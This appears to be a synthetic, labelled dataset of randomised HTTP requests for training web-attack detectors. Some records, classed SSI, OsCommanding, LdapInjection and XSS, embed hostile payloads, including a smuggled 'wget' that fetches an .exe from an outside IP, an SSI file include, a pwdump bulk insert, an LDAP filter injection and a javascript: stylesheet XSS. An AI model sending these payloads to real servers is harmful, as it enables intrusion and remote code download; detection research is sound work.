ETag: W/"Yfe0-6NuiP-_I.uqTw-T"
Expect: orhnyunp=kbe9
From: somsctd@slielEozga.ch
If-Modified-Since: Mon, 03 Apr 06 11:17:38 UTC
If-Unmodified-Since: Thu, 01 Sep 05 11:06:19 GMT
If-Match: *
If-None-Match: "3fg2Qt-.2k38V8E8-"
If-Range: Fri, 23 Apr 10 24:31:37 UTC
Max-Forwards: 859
MIME-Version: 9.3
Pragma: erc=ctnan
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM OHd3ZW90ZDk2aVVvcWVoemF2MXRlZTNudGFhd29uc21TYWluaXhwYXRlbGU=
Range: 3541-,85-,-23105
Referer: /adnznw/s7iNa/ilhfd.tar.gz
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.9 (X11; U; Unix 9.4; sn-nK; rv:8.5.0) Gecko/31413277
UA-CPU: 68000
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 982x566
Via: 9.3 96.150.1.206, HTTP/9.3 61.88.151.188
Transfer-Encoding: identity
Upgrade: 4sl7/2.9, iwl/9.9
Warning: 424 www.eiEotsb.html "JlC2tlnYe6ee" "Thu, 26 Jan 06 23:48:23 CET"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 21325127322802331
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24282
Start - Id: 40662
class: SSI
GET /sHu@/2WuRdqYgj/io/mHDpXmBo2a7OYbVIbXL/ffkHD5z4wU4H90.CoF54.css?zR_cW4O4RcT=OZ&reubE=49309153&hWL7Z7Rf=%26lefv%25At&YFJ6c=%3C%21--+++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&deau=eua7aehdnUAlwmh&dtyAitnh=+b3esck3F8tr&k12j=%27%3Cm+wr%409aes&osfe0pte=iftpcxtermTaaimET+ij&uben0ollge=+rwdv0ip6ce1&jh08unanatrhot=tlaffvarocnMne&sh=2zu34d&Dm=12775366&9nAhXHbselectk1=2020949049&Me9P6=5510136644&aeoheoyii7uTad=719 HTTP/1.1
Host: www.et0wl.cz
Connection: iadnOEq
Accept: */*;q=0.9
Accept-Charset: iso-8859-9;q=0.2, cp-950, iso-8859-4, x-mac-greek, windows-1257
Accept-Encoding: *;q=0.4
Accept-Language: ihiaegrz-eFt, c1polhc-d
Cache-Control: no-cache
Client-ip: 248.142.217.61
Cookie: nocmsIas2rn=912324
Cookie2: $Version="0"
Date: Sat, 01 Nov 08 13:35:51 GMT
ETag: "ZSKP9aGFodSxvsTRK"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Fri, 09 Jan 09 02:28:31 GMT
If-Unmodified-Since: Tue, 06 Nov 07 04:34:22 GMT
If-Match: "JdRWOnDm@sUJL3pYTs"
If-None-Match: "5vRZt@-UWRardWndzh8m"
If-Range: Fri, 07 Jul 06 24:05:34 GMT
Max-Forwards: 994
MIME-Version: 1.3
Pragma: sl=nG
Authorization: tdhe Eaomeisu=sseTbs
Referer: http://www.edwxTgtn.st/owghUwd/oePos/i1tSa.txt
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 1.1; Mn-an; rv:7.6.0) Gecko/46315938
UA-CPU: 68000
UA-Disp: 574,0063,16
UA-Color: color32
Via: e8sord/7.3 www.s9nrlLgi.tiff, ayanoe/8.2 181.132.36.103
Transfer-Encoding: olnood
Upgrade: risQna/2.8, sooR/8.6, loin/4.5, Eydro/8.2, Hdic/5.8
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40662
Start - Id: 1475
class: Valid
GET /Fbqartenldo/cXvoLJ0VhR06CV/rcinB3tygdi/hhrSeeOnfte/n9rydygm2OsDss.tiff? HTTP/1.0
Host: www.lcaidRte.it:80
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sz1i4c-tam, 9oh-efst, Ee3st-ie9leHn;q=0.6, l-ald0;q=0.4, i-iEoh
Cache-Control: max-stale=77901
Client-ip: 127.156.98.35
Cookie: emrsAebn1nsfiwT=3;oLFdua5h=rmfbf2uaoeBb;7acauhn=ysn ;drnOa=15;5@IAE=oBvk9jB;mIlosielSvi=Aefs5i7easl
Cookie2: $Version="7"
Date: Wed, 02 Dec 09 23:33:44 CET
ETag: W/"Ila-fdud7MEedwFbpQb@"
Expect: 100-continue
From: tiod5gmm@lhpam6tw.de
If-Modified-Since: Tue, 02 Nov 04 22:16:49 CET
If-Unmodified-Since: Wed, 06 Oct 04 07:48:46 GMT
If-Match: "rYj8.m6.9-73DtBNhn."
If-None-Match: "ODr2HDw27osgWC5tv"
If-Range: *
Max-Forwards: 049
MIME-Version: 9.3
Pragma: nit='BpShs9w'
Proxy-Authorization: iUTNle deiuEMot=etidst
Authorization: Basic ZWhhZW5rZXM6a2Fwcw==
Range: -64,0-
Referer: /Pnd48i/deft8r2U.sh
TE: trailers,chunked
Trailer: If-Match
User-Agent: Mozilla/8.4 (compatible; MSIE 4.5; Open BSD i586; 9gch; heed; oemy)
UA-CPU: x86
UA-Disp: 8211,4970,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 601x836
Via: 2.0 www.shRxt.jpg, 1.9 11.105.78.66
Transfer-Encoding: A7a7; oibTnso=tssRryni
Upgrade: neitwi/0.9, uctqlB/3.1, earnsE/8.0, iaueI/8.8, udoan/5.7
Warning: 445 148.177.34.53 "uas4eeti0naDsAesn8" 
X-Forwarded-For: 6.0.93.109
X-Serial-Number: 8617636872722590
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1475
Start - Id: 22334
class: Valid
GET /exoeha/rrd/eP3@S26oZSKeWbTuv5F/er8n1N.cfm?lupdatewE=729113&aat3t=i9&ra=6690&Fq5SP4agq-8S=or5%7CsavoAr+sE&x@.uU=1987901430&nu=Hxh8tndyuSeccet&te=k%241+i7saao+ede%3Duc&ts=kia%3EuarbeShUbBo HTTP/1.0
Host: www.upGdqyj.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-1;q=0.8, windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ir='e'
Client-ip: 186.185.1.249
Cookie: u78.iWC=tstnixn;o9dU=5139717390;yto9gdasirue='t5r;sl7aemOirr=edwh;aeerodq=1nNn1n
Cookie2: $Version="8"
Date: Sat, 09 Dec 06 13:53:55 GMT
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: 100-continue
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Sat, 19 Apr 08 16:56:17 GMT
If-Unmodified-Since: Wed, 30 Jul 08 12:01:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM YTZoc25vd3RkM2lsbG9jc3c0QXNlY3NyaXFsdGVyaXVsc3R0b2V0aWI=
Authorization: Basic OW44dHI6b3JlaQ==
Range: 562648-,892394-
Referer: http://www.c2fgnw.gov/uswh1o4e/6inoWhDw/pe6ovso/anerni/teii5t.php
TE: trailers
Trailer: Trailer
User-Agent: 3vnH/5.7.2.3.0
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: auXnfx/3.0 213.148.48.217
Transfer-Encoding: deflate
Upgrade: ujhe/8.0, pws/9.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 205.232.245.228
X-Serial-Number: 8809830
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22334
Start - Id: 15625
class: Valid
GET /lttei3bjmnemqaporrl/rsanm/9hsb2TsgYs2i4i/oydz4lboelhshp/wRJsqjg9UsOp/tNhce/secru/0Ub4/ewcLgqieEn/t8qk2.png? HTTP/1.1
Host: 196.110.159.60
Connection: keep-alive
Accept: application/zip
Accept-Charset: x-mac-japanese;q=0.5, iso-10646-ucs-2;q=0.1, iso-8859-1;q=0.4, iso-2022-kr;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.162.36.233
Cookie: ehyinpzh=0;ieonw=iQzU0Me;z0Worp=com8opddnnh
Cookie2: $Version="681"
Date: Thu, 25 Jun 09 23:21:13 CET
ETag: W/"12NQOr7jXUOXeYr"
Expect: eE1lApe=antdoo;tnod=inuei
From: tre3@eoezisahr.net
If-Modified-Since: Sun, 30 Aug 09 09:03:42 UTC
If-Unmodified-Since: Thu, 07 Jun 07 01:53:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 9.3
Pragma: i=1s6vrir
Proxy-Authorization: NTLM MnNlRHh4aG54c213RmY5cnNlbjRubnlhcWJ0ZWR6bGhuZ3Y5bmVzbmxhb3NjZW0=
Authorization: NTLM b2had1RtZXZPbmlvbWI5Z29VdHNyckh0U3M1ZWVsbmVnZXN1eWVh
Range: 3-,76842-90
Referer: http://www.iaauhee.ch/umKye/srim.asp
TE: trailers,chunked
Trailer: Connection
User-Agent: yxpFdBF8PF http://www.evnr.de
UA-CPU: PowerPC
UA-Disp: 331,063,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: bne8b/6.4 207.154.161.35, bta/0.3 170.53.124.136, 2.8 www.asiobv.html
Transfer-Encoding: 2nhr
Upgrade: aih/4.7, ohs/5.1
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 15625
Start - Id: 17878
class: Valid
GET /pgoaTxUfU/318tjQDDTqKij-MoE/ihnriweeKsn/metaxmlJ1LLN@GsamF.jpg?orbCsnaDf=178273250&qavdoshe=tysyan7o3&tH=Brjechoh4%5C&3ialr6mb4sAhn=Uetc&nAtyleyM12Ke=-Sdi&rae=22&tsnte8hsE=2&ueR4u9gees=ecem+ys%26homeas&3us7tm=aElrujn HTTP/1.0
Host: www.rgHaqlan.fr
Connection: keep-alive
Accept: application/*;q=0.8, audio/*, text/*
Accept-Charset: iso-2022-jp, utf-8;q=0.2, x-mac-ce;q=0.7
Accept-Encoding: 
Accept-Language: tJ-fsN8
Cache-Control: only-if-cached
Client-ip: 78.14.160.119
Cookie: reh=dS lO;Lec=923;uItussNbp8ceOo=0r-eedcoEsaea cnus;sIae0toqp=Aue$:%R4c2gh6s
Cookie2: $Version="47"
Date: Sat, 14 Feb 09 10:56:15 GMT
ETag: "WYZCTFqMXoHy0l3Li"
Expect: 100-continue
From: obt52e@273onh4Wsq.be
If-Modified-Since: Thu, 08 Feb 07 20:23:56 GMT
If-Unmodified-Since: Sun, 28 Dec 08 24:38:42 GMT
If-Match: "lPt2Jl6TJ2k48i7XPJ"
If-None-Match: "BIt34UTjsDOD.Mo1bw"
If-Range: Mon, 05 Feb 07 08:51:25 CET
Max-Forwards: 171
MIME-Version: 8.8
Pragma: sws8eoe='ct5ivI'
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic aGFleTplZWFyN3Bu
Range: -7
Referer: http://Aneddhea.biz/urhoW/J3eaak/ezzh/zdlt.jpg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 6.0; od-oe; rv:8.1.2) Gecko/69371439
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: compress
Upgrade: eet6ho/3.9, ejtp/8.6, peU/4.3, sesian/5.3, aerob/7.8
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17878
Start - Id: 18379
class: Valid
GET /ylI8B5CNB1N6_p2fe/Zx/atOIqke3_E/cat.E0d_PzV/mnuJ26fseqa/ztfSOhA4I_2T9l6/o2eoqren5nysmeh/oteme8srneAReeMimtt/hkAFc-aU4Pwwd.shtml?oytlccwty=3973762&dks6hr=%7Ck+&rssaybqCSz=thedo&renetes82niTs=nh1&Srih=53788249 HTTP/1.1
Host: 167.72.169.203
Connection: mlrrf
Accept: video/*, audio/basic;q=0.6, application/x-tar
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: y-e;q=0.9, ifrr-iuoHD;q=0.2, ha-icohttX;q=0.1
Cache-Control: no-store
Client-ip: 158.59.108.24
Cookie: xrmt==t0iaeh$riaht;iYPgrD8ihaat=Set;npeeruTfes=telmwtgjcpph;i7Ua4bf=wioptl
Cookie2: $Version="479"
Date: Mon, 14 Aug 06 19:43:02 CET
ETag: "S@Q0opw@hYCp70bEF"
Expect: 100-continue
From: riig0g@lptIii.ch
If-Modified-Since: Thu, 06 Oct 05 05:36:56 GMT
If-Unmodified-Since: Sat, 04 Jun 05 11:55:45 CET
If-Match: *
If-None-Match: "XI20rDIHkEG.w7p"
If-Range: "q68rFWO1Omsd3fOLso"
Max-Forwards: 89
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic YXNob2lvZTplSG1h
Authorization: NTLM cmdlbWJyZWhyb21hNFlhcmFnZ3RhVXNvYWlocmNucXFhZGhzdHNvYTlIZA==
Range: -1,77209-
Referer: /AX7e4Ata/tetue0.dll
TE: gzip;q=0.9
Trailer: If-Match
User-Agent: Mozilla/8.4 (Windows; U; Win98 3.0; la-e2; rv:6.7.1) Gecko/72910603
UA-CPU: x86
UA-Disp: 3794,7413,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0744x394
Via: FTP/3.8 101.14.113.131, 2.4 www.rasese.js, 6.9 www.Ubtelsrk.css
Transfer-Encoding: deflate
Upgrade: San/7.3, ca4nhm/3.6, ldv9e/4.7, tOe4/9.1
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 0724313649410885
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18379
Start - Id: 36420
class: OsCommanding
GET /0TceSektweiwwi/a7p@L-9aCey3@-gIG6/t_ytaTZqH0Q@q@7/pC7la.3q/99XitvW/eii9.swf?edwve=h7%28rwaaiylhux%2Fcat&opeznnndxlx=bulk++++insert++n3bo9nh3+from+++%27pwdump.exe%27+++++with+%28codepage%3D%27RAW%27+%29 HTTP/1.0
Host: 78.191.210.17
Connection: 3bswsnT
Accept: */*;q=0.2
Accept-Charset: windows-1250, windows-1252, us-ascii, x-mac-ce
Accept-Encoding: compress, deflate, gzip, gzip;q=0.0, compress
Accept-Language: qnrRgip-6e, iis-auyr, ttve1-n6rie
Cache-Control: no-store
Cookie: etntrae=innOdfdhOen7;esdteOYtpHiUvl=tksyehi;ntFte=9703;osewziflcog=603352
Cookie2: $Version="2"
Date: Fri, 28 Apr 06 12:02:52 UTC
Expect: 100-continue
If-Modified-Since: Sat, 08 Mar 08 24:21:51 GMT
If-Unmodified-Since: Fri, 18 Aug 06 22:48:31 CET
If-Match: *
If-Range: "gjwFm2apCzAIYeku"
Max-Forwards: 6407
Pragma: naank=el
Proxy-Authorization: NTLM dG1za2VudGxpeXR5ZWRSQWdodm9mcHpSdGVmWGlvbmpyZXRiZTM5bGt1
Authorization: Basic YWhlZXhkaXM6ck9vZWE=
Referer: http://BvsSe.ch/7rtosi/p20iEre3/SoewP/tisaIfa.txt
User-Agent: lqieq (noDEqtWp; eGck9XVC; u35CFDr; a3YOve.zPo; mqpma1HM)
UA-Color: color16
Via: 1.9 212.65.243.243, HTTP/5.2 www.ehrodi.jpeg
Transfer-Encoding: compress
Warning: 123 www.r6hayneh.css:34967 "ekee0eeac6" "Fri, 19 Aug 05 20:22:44 CET"
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36420
Start - Id: 37548
class: LdapInjection
PUT /fNodDV.r/oHgpneef/b4Vr-B0NS1like4ftpmy/tw0V0fqkFNf.WCFG.jsp? HTTP/1.0
Content-Length: 30
Content-Language: m7,imzppdes,ld
Content-Encoding: compress
Content-Location: /s6dikn/umcaw/l9Oe/o6amcyT/tife.png
Content-MD5: Z3VoOXNhYTRyYXRwZWVpMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jan 08 07:28:46 UTC
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 113.100.107.23
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: oh4hr6o-sqit;q=0.2, ohzb81ds-iub, iahrysBx-tceikEm;q=0.7
Cache-Control: max-stale
Client-ip: 115.143.65.85
Cookie: nurahoWehie=e gyaeee0(vstdinformqhs
Cookie2: $Version="00"
Date: Fri, 05 Dec 08 19:23:02 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 12 Feb 06 15:01:58 CET
If-Unmodified-Since: Wed, 28 Jun 06 12:32:32 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: "qap5vEFQmzA_r_TF"
Max-Forwards: 9
MIME-Version: 7.0
Pragma: le3sT='taUr96ce'
Proxy-Authorization: Basic bWZydGV3dDpvdGlp
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: 0516-7855,069180-,334-
Referer: /ha2ul/art1nnS.jpeg
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: entcestltwfomE
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 1680x065
Via: 5.9 216.20.13.22
Transfer-Encoding: 7sew
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 983 109.244.195.91 "L7Uqnd6Rnxrtrw" "Mon, 04 Apr 05 04:37:49 GMT"
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nt=ie)( |  (npn=*)

End - Id: 37548
Start - Id: 5462
class: Valid
PUT /scWGYkft1M5Brz7u.Mv/en7pev4gHEMiFLh1u6o.png? HTTP/1.0
Content-Length: 249
Content-Language: t,I8y6ddA
Content-Encoding: gzip
Content-Location: /tapCs/cehicn/wxtoa5i/Atxirad.asp
Content-MD5: ZG1sbWFOb3RpbmFuc29jbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Nov 08 03:55:38 CET
Last-Modified: Thu, 22 Jan 04 15:29:28 GMT
Host: www.oT5we8.it
Connection: datEa
Accept: */*
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: meOAntSi-ta2naHmo;q=0.6
Cache-Control: min-fresh=6
Client-ip: 45.222.201.177
Cookie: sil=oMjB-o@Pp;bjpjaocihtM3n8r=05790758;i5pz=4809
Cookie2: $Version="55"
Date: Thu, 21 Jul 05 06:05:19 GMT
ETag: "5DxH4NUkctaWASH"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Tue, 07 Oct 08 16:56:24 UTC
If-Unmodified-Since: Thu, 18 Oct 07 17:00:05 UTC
If-Match: *
If-None-Match: "Knr1dM7x@.3H@sEwqSo"
If-Range: Fri, 07 Nov 08 02:07:42 GMT
Max-Forwards: 5
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: Digest realm
Range: 25867-
Referer: /dHtee.sh
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.3 (Windows; U; Win98 4.1; tg-af; rv:9.3.2) Gecko/05592410
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2059x834
Via: HTTP/3.5 www.xehseu.css, hssEp/4.2 166.230.239.85, oeerDo/0.9 222.74.163.86
Transfer-Encoding: identity
Upgrade: k9i/1.1, mnmtv/1.4, tiyr/9.0, tsr/3.1
Warning: 198 www.earWees.jpg "iai98tpeegtl0r" "Sat, 12 Aug 06 14:50:22 CET"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 757852
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wgntt7Tthuw=r&y6entI=matec&sheo7O4vteFxSn=8&no=eadnteohw am&6tEnLG=04494&Y8JZVlink_zhttpMa=Io&rcoo=47244&Aplkc=pejtwpTqseeeqPmfam&sawebrsoSf=480&a1airuen=82620421&eopl=nlpid&6aucSatRiovn=Ttfa&no=iql&L36RacJuwi=dFiXPTZDhD&ioanb54hoamsotA=vs01rcarreli

End - Id: 5462
Start - Id: 46995
class: XSS
GET /hipQL.eP.2openq0C/sofwibo/rZilqqKv@N3jpuVRh/u1TDsmJIrNO0YinsoE/aztdlqxapeyrtdhwfar/sboheo2guegn/toyinci6/sxklcmdBasKFidstdin.mspx?ZHM1dYhome4=40743&9F3itg9=h%5Duttf%40%7CtEn&aixu=copyS-%27es%3AtrrddtmetaM%5Dg&a6eaXSsOz=elenMbkEw6&yeeerehzy3=etguhstpnardei6&idpmTe8tssAyeEo=%3Clink+++++rel+%3D+++%22++++stylesheet++%22++href+++%3D+++%22+++++javascript%3A++%5Balert++++%28%27yenettte3%27%29%3B%5D%22++++%3E&6tedn=UoeyarleeIas6e&QdZ@_L6=f HTTP/1.0
Host: 158.178.187.212
Connection: gehueby
Accept: application/rtf
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ds-77Ss6nw;q=0.8
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: Toih3Tnse=s+vvn;lisxrunneara=it:2;0on0dRsltihazT=9itlwerht tawDs1
Cookie2: $Version="5"
Date: Wed, 21 Apr 10 12:11:36 CET
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: ott8b@Cjemsdre.it
If-Modified-Since: Sat, 28 Feb 04 09:10:24 CET
If-Unmodified-Since: Sun, 23 Sep 07 04:05:18 CET
If-Match: "P8GGMWq8ANjHOFg"
If-None-Match: *
If-Range: "DzDJpdX@FFDYvvts"
Max-Forwards: 038
MIME-Version: 0.5
Pragma: rlane2i='2'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic d29oT2U3dDplYUhlc3RJ
Range: 5-22964
Referer: /hsr0c/naAo/geaeotDe/ltkwhsp.asmx
TE: trailers
Trailer: Upgrade
User-Agent: eesp (dhNT2FVcCE)
UA-Disp: 817,484,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: HTTP/5.9 www.nlRhh.tiff, 9.9 119.44.95.43
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 352 28.5.137.111:2561 "wEaonerhna" "Mon, 13 Sep 04 13:04:56 UTC"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46995
Start - Id: 8463
class: Valid
GET /typTtqAi0alo/sKUIGPCfZSRw8p.exe? HTTP/1.0
Host: 231.109.157.61
Connection: 1hesent
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: sahmBdhA-i;q=0.0, nmial0t-45e6ry, zei-xa, yeErnte-eCU3sfdt;q=0.7, wwasdond-50oevlr;q=0.6
Cache-Control: no-transform
Client-ip: 80.15.106.68
Cookie: KWp0ywgetGhQecmd=1320481
Cookie2: $Version="52"
Date: Sun, 06 Aug 06 01:56:49 GMT
ETag: "5@-h0CX6G2ar9PNoUe8"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Thu, 23 Jun 05 17:02:18 UTC
If-Unmodified-Since: Sun, 08 Nov 09 09:26:14 GMT
If-Match: *
If-None-Match: "xG7p.@VcR5OS9eO@I"
If-Range: "vP5AZPuAp2NYMvN5Q6R"
Max-Forwards: 583
MIME-Version: 5.1
Pragma: awvrllt5='tsehd'
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Digest nonce
Range: 7593-23,41-590
Referer: /id42a2/tntn/isle/ehOteMVa.pl
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: puyhyrtfeeec3Itagsy
UA-CPU: Sparc
UA-Disp: 1917,3085,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 963x121
Via: FTP/5.9 www.Ocigg.css, HTTP/7.9 www.hemsf.shtml
Transfer-Encoding: identity
Upgrade: att6/5.9, lascr4/0.2, dko/7.4, ujer/7.0, 6vnnaz/2.3
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 254.66.143.32
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8463
Start - Id: 42926
class: OsCommanding
GET /o7DqjPsAHrDWKH83NtC/mth5hg/lexorThlestaalgee/8B/NeWdLcUW1pkaqU5/jtQ/t4aseae4.shtml?gEpk9e4VOxC=n2pee5pr2hwv HTTP/1.1
Host: www.seao8yr.ch
Connection: ahc9Sdwe
Accept: application/*, image/*;q=0.5, video/quicktime;q=0.7
Accept-Charset: iso-8859-8-i, euc-cn;q=0.5, cp-936;q=0.9, utf-8;q=0.9, macintosh
Accept-Encoding: identity;q=0.6
Accept-Language: \n     wget   http://83.217.175.217:75/nftp.exe
Cache-Control: no-transform
Client-ip: 22.171.202.170
Cookie: neiym=72669002;aaedw7st=d$ naeru)ri<dy;evif3rqoe8a=osz il1aq7o+;gafpdth=CtzolaolinkoAt<ef;M3FZ_=(m
Cookie2: $Version="1"
Date: Mon, 24 Oct 05 03:10:45 CET
ETag: "5E.6ZDTdRKI89MzLURL"
Expect: 100-continue
From: oIteteaa@odaSo1YA.it
If-Modified-Since: Fri, 21 Jul 06 19:58:19 CET
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "id32qG.ezA8HFbJjQ"
If-None-Match: "3nCfw4UONXfj@0duRL"
If-Range: "vkwISyJp_eMW5fz5aE"
Max-Forwards: 314
MIME-Version: 4.5
Pragma: exisd5Sr=rtEth
Proxy-Authorization: Basic QWdkZWhUZzpoZUxvV3U=
Authorization: Basic dm9haTFpYTpvaGFjbm0=
Range: 3-6521,8-,9454-87196
Referer: http://pjcmndc.com/libe1nli/o4nhunie.swf
TE: trailers,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Sitb0eo
UA-CPU: Sparc
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8266x6680
Via: fulimp/9.8 47.115.6.229, 1.0 62.254.159.212, 0.9 41.20.31.187
Transfer-Encoding: compress
Upgrade: olEofa/6.2, 8uc/9.8, mieh/1.6
Warning: 320 87.240.162.136 "BZic9fp8doYtdcn7ny" "Mon, 28 Apr 08 21:39:35 GMT"
X-Forwarded-For: 15.151.59.253
X-Serial-Number: 740578265962
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42926
Start - Id: 7019
class: Valid
POST /ea84I8usnb/hcdatieizl31ea/xKX6Wr3.php? HTTP/1.1
Content-Length: 129
Content-Language: 9or,an,nmnOonGi
Content-Encoding: deflate
Content-Location: /oh37gu/seivFeln.aspx
Content-MD5: dHI2bGxvZGlvZWlqQWUwcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Dec 04 05:16:19 UTC
Last-Modified: Sat, 01 May 10 05:24:52 GMT
Host: 212.18.127.144:83
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.5, isiri-3342;q=0.0, cp-950;q=0.0, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: irLemMv-lylsehwn
Cache-Control: max-stale
Client-ip: 226.93.8.242
Cookie: adsipseNeD=sn
Cookie2: $Version="044"
Date: Sun, 03 Apr 05 23:05:13 CET
ETag: W/"EYnKJ_ImQnqZbHF@"
Expect: 100-continue
From: 3aelr@ah0pebewsn.st
If-Modified-Since: Fri, 15 Dec 06 01:55:02 GMT
If-Unmodified-Since: Mon, 09 Jul 07 23:37:13 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Mar 08 16:04:33 GMT
Max-Forwards: 44
MIME-Version: 5.3
Pragma: jsutwnn=7ta
Proxy-Authorization: cls18 ensvsjo=ofs8etd
Authorization: NTLM bmVKMnN0dGFhZTd0cjE2dHpzdWJzaGh0cXZpSW9uZHN3dGlkaVVpczhkcW5scjNu
Range: 594453-,90-83016,710615-38453
Referer: /dleeh.sh
TE: deflate,gzip
Trailer: Cache-Control
User-Agent: rajtete/3.1
UA-CPU: StrongARM
UA-Disp: 5230,785,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 443x583
